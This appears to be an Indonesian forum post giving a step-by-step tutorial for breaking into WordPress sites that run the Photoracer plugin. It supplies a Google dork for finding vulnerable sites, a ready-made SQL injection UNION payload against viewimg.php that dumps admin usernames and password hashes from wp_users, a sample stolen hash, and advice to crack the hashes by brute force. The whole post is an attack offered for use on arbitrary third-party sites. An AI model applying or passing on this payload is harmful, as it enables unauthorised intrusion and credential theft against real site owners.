My Forum

Exploit Wordpress with sql injection

Bagikan ke Teman! :






waaah udah lama flazer udah tidak berbagi lagi hehehe sekarang saya coba corat coret lagi ya di blogger tercinta ini yuhuuu langsung aja ya lagi males nulis :D
Ya, memang tutorial ini merupakan tutorial lama tapi tidak ada salahnya kan berbagi? Ok simak saja baik - baik.

1. Ketik dork berikut ke kotak pencarian google :
inurl:"wp-content/plugins/photoracer/viewimg.php?id=" 

2. Nantinya akan muncul beberapa web, buka salah satu untuk di eksekusi.

3. Tambahkan exploit ini di belakang url :  

+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass),7,8,9+from+wp_users


Contoh : www.site.com/wp-content/plugins/photoracer/viewimg.php?id=1
menjadi www.site.com/wp-content/plugins/photoracer/viewimg.php?id=-1+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass),7,8,9+from+wp_users 

4. Nah, nanti bakalan muncul penampakan username dan password dari web tersebut.Contoh :
admin:$P$BfwsoL2ygVgJxpx3lLT9j/0IxRRgDB1 

5. Disitu, bentuk password masih berupa salt/MD5. Silahkan anda crack terlebih dahulu,
untuk password yang berupa MD5 bisa di crack menggunakan brute force dll :D